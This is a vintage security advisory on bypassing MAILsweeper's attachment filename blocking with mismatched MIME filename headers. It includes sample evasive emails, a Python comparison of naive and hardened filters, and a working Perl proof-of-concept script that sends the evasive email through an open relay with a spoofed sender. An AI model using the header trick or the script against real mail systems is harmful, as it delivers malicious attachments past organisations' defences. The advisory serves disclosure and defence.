COMMAND
MAILsweeper
SYSTEMS AFFECTED
MAILsweeper 4.2.* (other e-mail content filtering systems not tested)
PROBLEM
Aidan O'Kelly found the following. It affects companies or
organisations that rely upon MAILsweeper, or other e-mail content
filtering systems, to protect themselves against viruses or
malicious attachments by blocking e-mails on the basis of the
attachment filename.
A large number of organisations, including many IT security
companies, use MAILsweeper by Content Technologies (now Baltimore)
to prevent malicious viruses and / or attachments from entering
their networks. However, a situation has been brought to our
attention in which a malicious user can bypass the content
filtering in place.
When an administrator sets up file blocking using a filter (File
Blocker), the restriction can be bypassed by malforming the
attachment headers of an e-mail so that the system lets the e-mail
through to the user. This allows viruses and file types that the
administrator wanted to restrict into the network, possibly leading
to denial of service and data destruction.
When a user sends an e-mail to another user with an attachment,
the e-mail will include the mail headers, the body of the e-mail,
the attachment headers and the attachment (typically MIME
encoded):
Return-Path: user_a@test.com
From: User A <user_a@test.com>
To: User B <user_b@test.com>
Subject: Fw: FYI
Date: Thu, 22 Feb 2001 13:38:19 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.23)
Content-Type: multipart/mixed;
    boundary="----_=_NextPart_000_02D35B68.BA121FA3"
Status: RO

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; charset="iso-8859-1"

Hi,

Just popping a note to say hi!

Cheers,
User A.

------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain;
    name="virus.vbs"
Content-Disposition: attachment;
    filename="virus.vbs"

' Test Virus
' Blah blah blah
' Do something devastating here!

------_=_NextPart_000_02D35B68.BA121FA3--
You will see from the attachment headers at the end of the e-mail
that the filename of the attachment is defined twice: once as the
name= parameter of the Content-Type header and once as the
filename= parameter of the Content-Disposition header. The issue
that allows a malicious e-mail to bypass MAILsweeper's File
Blocking is that the blocking agent checks only the first filename
(the Content-Type name=) against the filter set up by the
administrator and ignores the second (the Content-Disposition
filename=).
The Outlook e-mail client uses the second filename when it saves,
opens or runs the attachment. It is therefore possible to craft an
e-mail whose first filename is a permitted type, which MAILsweeper
will let through, while the second filename still carries the
extension the administrator wanted blocked. If a File Blocking
filter is in place to block all attachments with filenames matching
*.vb*, the e-mail above will be correctly blocked, since both names
end in .vbs. The e-mail below, in which only the Content-Disposition
filename is virus.vbs, will pass through MAILsweeper unblocked and
be delivered to the user (assuming .doc files are not also being
blocked), and Outlook will present it as virus.vbs.
Return-Path: user_a@test.com
From: User A <user_a@test.com>
To: User B <user_b@test.com>
Subject: Fw: FYI
Date: Thu, 22 Feb 2001 13:38:19 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.23)
Content-Type: multipart/mixed;
    boundary="----_=_NextPart_000_02D35B68.BA121FA3"
Status: RO

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain; charset="iso-8859-1"

Hi,

A note to say hi!

Cheers,
User A.

------_=_NextPart_000_02D35B68.BA121FA3
Content-Type: text/plain;
    name="test.doc"
Content-Disposition: attachment;
    filename="virus.vbs"

' Test Virus
' Blah blah blah
' Do something devastating here!

------_=_NextPart_000_02D35B68.BA121FA3--
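The two messages above differ only in the Content-Type name= parameter. The following is an added example, not part of the original advisory and not MAILsweeper code: it parses both messages with Python's standard email package and puts a filter that, like the File Blocker described here, looks only at Content-Type name= next to one that checks every filename the part advertises and also treats disagreement between them as a block condition. The block list, the build_sample() helper (which constructs messages in the shape of the samples above), and the functions attachment_parts(), advertised_names(), naive_file_blocker() and hardened_file_blocker() are all assumptions made for this illustration.

```python
import fnmatch
from email import message_from_string, policy
from email.utils import collapse_rfc2231_value

# Hypothetical File Blocker rule set: glob patterns, matched case-insensitively.
BLOCK_PATTERNS = ["*.vb*", "*.exe", "*.scr", "*.js"]

BOUNDARY = "----_=_NextPart_000_02D35B68.BA121FA3"


def build_sample(ct_name, cd_name):
    """Constructed message in the shape of the advisory's samples.  The two
    filename parameters are supplied separately so that the honest variant
    (both say virus.vbs) and the evasive one (test.doc / virus.vbs) come
    from the same template.  Folded header lines are indented with a tab."""
    text = (
        "From: User A <user_a@test.com>\n"
        "To: User B <user_b@test.com>\n"
        "Subject: Fw: FYI\n"
        "MIME-Version: 1.0\n"
        f'Content-Type: multipart/mixed; boundary="{BOUNDARY}"\n'
        "\n"
        f"--{BOUNDARY}\n"
        'Content-Type: text/plain; charset="iso-8859-1"\n'
        "\n"
        "Hi,\nJust popping a note to say hi!\n"
        "\n"
        f"--{BOUNDARY}\n"
        "Content-Type: text/plain;\n"
        f'\tname="{ct_name}"\n'
        "Content-Disposition: attachment;\n"
        f'\tfilename="{cd_name}"\n'
        "\n"
        "' Test Virus\n"
        "' Do something devastating here!\n"
        f"--{BOUNDARY}--\n"
    )
    return message_from_string(text, policy=policy.default)


def attachment_parts(msg):
    """Yield every leaf part that is marked as an attachment or carries a filename."""
    for part in msg.walk():
        if part.is_multipart():
            continue
        if (part.get_content_disposition() == "attachment"
                or part.get_param("name", header="content-type") is not None
                or part.get_param("filename", header="content-disposition") is not None):
            yield part


def advertised_names(part):
    """Every filename a part advertises, keyed by the header it came from.
    Outlook acts on the Content-Disposition filename=; the advisory says the
    File Blocker only compared the Content-Type name= against its filter."""
    names = {}
    ct_name = part.get_param("name", header="content-type")
    if ct_name is not None:
        names["Content-Type name"] = collapse_rfc2231_value(ct_name)
    cd_name = part.get_param("filename", header="content-disposition")
    if cd_name is not None:
        names["Content-Disposition filename"] = collapse_rfc2231_value(cd_name)
    return names


def is_blocked_name(name, patterns=BLOCK_PATTERNS):
    name = name.lower()
    return any(fnmatch.fnmatchcase(name, p.lower()) for p in patterns)


def naive_file_blocker(msg, patterns=BLOCK_PATTERNS):
    """Model of the behaviour the advisory describes: only Content-Type name=
    is matched.  Returns a reason string when the message would be blocked."""
    for part in attachment_parts(msg):
        ct_name = advertised_names(part).get("Content-Type name")
        if ct_name is not None and is_blocked_name(ct_name, patterns):
            return f"blocked: Content-Type name {ct_name!r}"
    return None


def hardened_file_blocker(msg, patterns=BLOCK_PATTERNS):
    """Match every advertised filename, and block outright when the names
    disagree: the client will use whichever one the filter did not check."""
    for part in attachment_parts(msg):
        names = advertised_names(part)
        for source, name in names.items():
            if is_blocked_name(name, patterns):
                return f"blocked: {source} {name!r}"
        if len({n.lower() for n in names.values()}) > 1:
            return f"blocked: filename mismatch {sorted(names.values())}"
    return None


if __name__ == "__main__":
    for label, ct, cd in [("honest", "virus.vbs", "virus.vbs"),
                          ("evasive", "test.doc", "virus.vbs"),
                          ("benign", "notes.txt", "notes.txt")]:
        msg = build_sample(ct, cd)
        print(f"{label:8} naive={naive_file_blocker(msg)!s:45} hardened={hardened_file_blocker(msg)}")
```

Run as a script it prints one line per sample: the honest message is blocked by both filters, the evasive one only by the hardened filter (on the Content-Disposition filename), and the benign one by neither. A filter built this way still only sees what the headers claim; matching on the attachment's actual content type (the "Data Type Manager" route mentioned in the solution below) is the complementary check.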
msweep-fb.pl:
#!/usr/bin/perl
#
# Usage: ./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> <openrelay> - Single instance using <openrelay>
#        ./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> -r          - Single instance using a random relay
#        ./msweep-fb.pl -f <listofaddrs> <openrelay>                          - Send to / from a list of addresses (file) using <openrelay>
#        ./msweep-fb.pl -f <listofaddrs> -r                                   - Send to / from a list of addresses (file) using random relays
#        ./msweep-fb.pl [--help|-h]                                            - Prints out this usage list
#
# Open relays courtesy of cyberarmy.com - NOT IMPLEMENTED YET (will I ever get time?)
#
# N.B. This is kwik and n45tY! (o)(o)
#
# Libraries:
#
use strict;
use warnings;
use IO::Socket::INET;
#
# Constants (SMTP commands; CRLF is appended when each one is sent):
#
my $hstProto = "tcp";
my $hstPort  = 25;
my $mailHELO = "HELO world";
my $mailFROM = "MAIL FROM:";
my $mailRCPT = "RCPT TO:";
my $mailDATA = "DATA";
my $mailTERM = ".";      # end-of-data marker, sent on a line of its own
my $mailQUIT = "QUIT";
#
# Send one SMTP command, echo it and the server's reply, return the reply.
#
sub smtp_cmd
{
    my ( $sock, $cmd ) = @_;
    print "MSweep DEBUG: $cmd\n";
    print $sock "$cmd\r\n";
    my $reply = <$sock>;
    print "MSweep DEBUG: $reply\n";
    return $reply;
}
#
if ( defined $ARGV[0] && $ARGV[0] eq "-f" )
{
    print "WARNING! Not implemented yet\n";
    # open ( INPUT, "<", $ARGV[1] ) or die "ERROR! Cannot open source file $ARGV[1]";
    # my @INPUT = <INPUT>;
    # foreach my $line ( @INPUT )
    # {
    #     chomp ( $line );
    #     if ( length ( $line ) > 1 )
    #     {
    #     }
    # }
    # close ( INPUT );
}
elsif ( defined $ARGV[4] && $ARGV[4] eq "-r" )
{
    print "WARNING! Not implemented yet\n";
}
elsif ( @ARGV == 5 && $ARGV[0] ne "--help" && $ARGV[0] ne "-h" )
{
    my ( $fromName, $fromAddr, $toName, $toAddr, $hstRelay ) = @ARGV;
    my $sktMSweep = IO::Socket::INET->new( PeerAddr => $hstRelay, PeerPort => $hstPort, Proto => $hstProto )
        or die "ERROR! Couldn't connect to $hstRelay : $hstPort - $@\n";
    my $sktReply = <$sktMSweep>;    # server banner
    print "MSweep DEBUG: $sktReply\n";
    smtp_cmd( $sktMSweep, $mailHELO );
    smtp_cmd( $sktMSweep, "$mailFROM<$fromAddr>" );
    smtp_cmd( $sktMSweep, "$mailRCPT<$toAddr>" );
    smtp_cmd( $sktMSweep, $mailDATA );
    print "MSweep DEBUG: Sending e-mail...\n";
    #
    # The File Blocker matches the Content-Type name= ("test.doc"); Outlook
    # saves and runs the Content-Disposition filename= ("test.txt.vbs").
    # Folded header lines are indented, as MIME requires; LF is converted to
    # CRLF before the message is written to the socket.
    #
    ( my $mail = <<"end_of_mail" ) =~ s/\n/\r\n/g;
Return-Path: <$fromAddr>
From: $fromName <$fromAddr>
To: $toName <$toAddr>
Subject: Fw: FYI
Date: Mon, 19 Feb 2001 10:36:12 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (10.10.123)
Content-Type: multipart/mixed;
    boundary="----_=_NextPart_000_01C09A86.DA181CF6"
Status: RO

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C09A86.DA181CF6
Content-Type: text/plain; charset="iso-8859-1"

---------- Forwarded message ----------

Date: Thu, 15 Feb 2001 16:21:42 -0800
From: Network Security Team \@ MIS <fake-mail-addr\@mis-cds.com>
To: Unsuspecting user <unsuspecting.user\@test.com>
Cc: Unsuspecting user 2 <unsuspecting.user2\@test.org>
Subject: Fw: Proof of concept for bypassing MailSweeper

Hi,

By double clicking on the attachment, a text box should appear. This is a proof of concept exploit for a vulnerability in MailSweeper's file content checking mechanisms.

NST,
MIS Corporate Defence Solutions Ltd.

------_=_NextPart_000_01C09A86.DA181CF6
Content-Type: text/plain;
    name="test.doc"
Content-Disposition: attachment;
    filename="test.txt.vbs"

msgbox("MIS Corporate Defence Solutions has compromised your organisations e-mail content filtering systems. This is part of the ongoing Network Penetration Test by MIS. Please contact your Network Administrator or the MIS Network Security Team on nst\@mis-cds.com for further details")

------_=_NextPart_000_01C09A86.DA181CF6--
end_of_mail
    print $sktMSweep $mail;
    smtp_cmd( $sktMSweep, $mailTERM );
    smtp_cmd( $sktMSweep, $mailQUIT );
    close( $sktMSweep );
}
else
{
    print "Usage:\t./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> <openrelay>\t- Single instance using <openrelay>\n";
    print "\t./msweep-fb.pl <fromname> <fromaddr> <toname> <toaddr> -r\t\t- Single instance using a random relay\n";
    print "\t./msweep-fb.pl -f <listofaddrs> <openrelay>\t\t\t\t- Send to / from a list of addresses (file) using <openrelay>\n";
    print "\t./msweep-fb.pl -f <listofaddrs> -r\t\t\t\t\t- Send to / from a list of addresses (file) using random relays\n";
    print "\t./msweep-fb.pl [--help|-h]\t\t\t\t\t\t- Prints out this usage list\n";
}
exit();
SOLUTION
Baltimore has released a workaround and a utility to help prevent
this issue from being exploited. Use the "Data Type Manager" where
applicable, and install the script.exe utility to check attachments
for malicious script content (available from:
http://www.contenttechnologies.com/download/extras/free_utilities.asp#Script%20Tool).